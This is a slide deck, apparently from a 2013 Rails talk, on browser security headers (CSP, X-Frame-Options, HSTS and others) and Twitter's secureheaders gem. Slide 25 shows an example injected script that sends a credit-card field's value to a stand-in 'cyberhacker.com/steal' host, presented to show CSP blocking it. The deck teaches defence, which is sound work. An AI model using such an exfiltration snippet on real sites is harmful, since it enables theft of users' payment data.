The document discusses web security headers that leverage browser capabilities to enhance security, emphasizing the importance of implementing various headers like Content Security Policy, X-Frame-Options, and HTTP Strict Transport Security. It highlights how these headers can prevent vulnerabilities such as XSS and mixed content issues while providing strategies for implementation and monitoring. Additionally, it mentions tools and practices for enforcing these security measures effectively within applications.

1. B
Not your typical
Rails security talk
Header use @ Twitter
@ocrails
January 30, 2013
@ocrails | @ndm

2. What are headers?
@ocrails | @ndm

3. Wait, not those ones
@ocrails | @ndm

4. OK, but what are browser headers
Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
Accept: text/plain
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101
Firefox/12.0
@ocrails | @ndm

5. Response headers
Cache-Control: max-age=3600
ETag: "737060cd8c284d8af7ad3082f209582d"
Location: http://www.w3.org/pub/WWW/People.html
@ocrails | @ndm

6. I’m already bored
Time to get awesomer
@ocrails | @ndm

7. Security headers
Leverage the browser for security
@ocrails | @ndm

8. Sweeeeet. I don’t have write secure code!
@ocrails | @ndm

9. Time of convergence
@ocrails | @ndm

10. Should you?
@ocrails | @ndm

11. Do you use these?
Content security policy
X-Frame-Options
HTTP Strict Transport Security
X-Xss-Protection
X-Content-Type-Options
@ocrails | @ndm

12. X-ContentType-Options
Fixes mime sniffing attacks
Only applies to IE, because only IE would
do something like this
X-Content-Type-Options = ‘nosniff’
zzzzZZZZZZzzzzz
@ocrails | @ndm

13. X-Xss-Protection
Use the browser’s built in XSS Auditor
X-Xss-Protection: [0-1](; mode=block)?
X-Xss-Protection: 1; mode=block
(SCREENSHOT OF BLOCKED SCRIPT)
zzzzZZZ... huh? zzzzzzzz
@ocrails | @ndm

14. X-Frame-Options
Protects you from most classes of
Clickjacking
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW FROM
example.com
zzz... oh hey thats cool. Don’t frame my stuff.
@ocrails | @ndm

15. X-Frame-Options
@owaspoc Jan 2013
@ndm | @presidentbeef

16. Firesheep/SSL Strip
Given I don’t haven’t received an HSTS header
And I have a session
When I visit http://example.com
Then I am pwned
@ocrails | @ndm

17. Other ssl fails
Posting passwords over HTTP
Loading mixed content
Using protocol relative URLS
@ocrails | @ndm

18. Strict Transport Security
@ocrails | @ndm

19. How hard is it to use?
Base Case
Strict-transport-security: max-age=10000000
Do all of your subdomains support SSL?
Strict-transport-security: max-age=10000000; includeSubdomains
(SSL FOR DUMMIES PICTURE)
@ocrails | @ndm

20. Content secur-a-wat?
Content security policy is reshaping the security model
It is a complicated spec with great differences across browsers
It is not widely adopted
However,
It completely eliminates reflected and stored XSS
It ensures that you never load mixed content
It can protect users with infected browsers
It allows you to accept arbitrary html code from users
@ocrails | @ndm

21. Wat? Sounds cool.
x-webkit-csp:
script-src
style-src
img-src
default-src
frame-src
connect-src
font-src
media-src
object-src
report-uri | @ndm
@ocrails

22. QuickTime™ and a
H.264 decompressor
are needed to see this picture.
@owaspoc Jan 2013
@ndm | @presidentbeef

23. Get rid of XSS, eh?
A script-src directive that doesn’t contain ‘unsafe-inline’ almost
eliminates most forms of cross site scripting.
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
@ocrails | @ndm

24. @owaspoc Jan 2013
@ndm | @presidentbeef

25. But I have to...
OK, then I’ll inject:
<script>
var image = new Image();
image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val();
</script>
FALSE! img-src violation, no XHR allowed
@owaspoc Jan 2013
@ndm | @presidentbeef

26. Inline css too? WTF?
@ocrails | @ndm

27. Choose your own adventure
@ocrails | @ndm

28. Apply all the headers!
@ocrails | @ndm

29. How to apply?
Secure headers!
Open sourced earlier this month
https://github.com/twitter/secureheaders
@ocrails | @ndm

30. How does it work?
It sets a before_filter that applies each header
Values are based on options passed to filter, or in an initializer
Easily overridden
Secure by default!!!
@ocrails | @ndm

31. What about that security policy thingy
There are > 6 differences between these two header values
@ocrails | @ndm

32. Yay for standards
@ocrails | @ndm

33. Long hair don’t care
About browser inconsistencies
@ocrails | @ndm

34. Other features
Set separate policies for http/https
Autofill chrome-extension: (becoming part of spec)
Auto fill missing directives with default value (becoming part of the spec)
@ocrails | @ndm

35. You mean there’s more on CSP?
The browser sends reports!
@ocrails | @ndm

36. What does the report look like?
{
"csp-report"=> {
"document-uri"=>"http://localhost:3000/home",
"referrer"=>"",
"blocked-uri"=>"ws://localhost:35729/livereload",
"violated-directive"=>"xhr-src ws://localhost.twitter.com:*"
}
}
@ocrails | @ndm

37. Quiz: what does this report indicate?
{
"csp-report"=> {
"document-uri"=>"http://example.com/welcome",
"referrer"=>"",
"blocked-uri"=>"self",
"violated-directive"=>"inline script base restriction",
"source-file"=>"http://example.com/welcome",
"script-sample"=>"alert(1)",
"line-number"=>81
}
}
@ocrails | @ndm

38. Header gem to the rescue
It forwards CSP reports for Firefox
It makes setting an enforce and report only mode easy for
experimentation
@ocrails | @ndm

39. Monitor and Tune ALL the things
@ocrails | @ndm

40. Splunk
@ocrails | @ndm

41. Trending and anomalies
@ocrails | @ndm

42. CSP
Phantom Gang ThreatDeck
Brakeman Roshambo
Email Email
developers security
@owaspoc Jan 2013
@ndm | @presidentbeef

43. Who wants to buy me a beer?
@ocrails | @ndm